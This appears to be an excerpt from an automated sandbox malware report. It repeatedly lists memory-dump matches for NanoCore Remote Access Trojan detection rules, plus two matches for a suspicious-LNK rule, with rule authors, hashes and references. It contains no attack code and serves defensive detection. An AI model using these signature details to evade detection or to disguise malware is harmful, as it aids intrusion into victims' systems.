      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
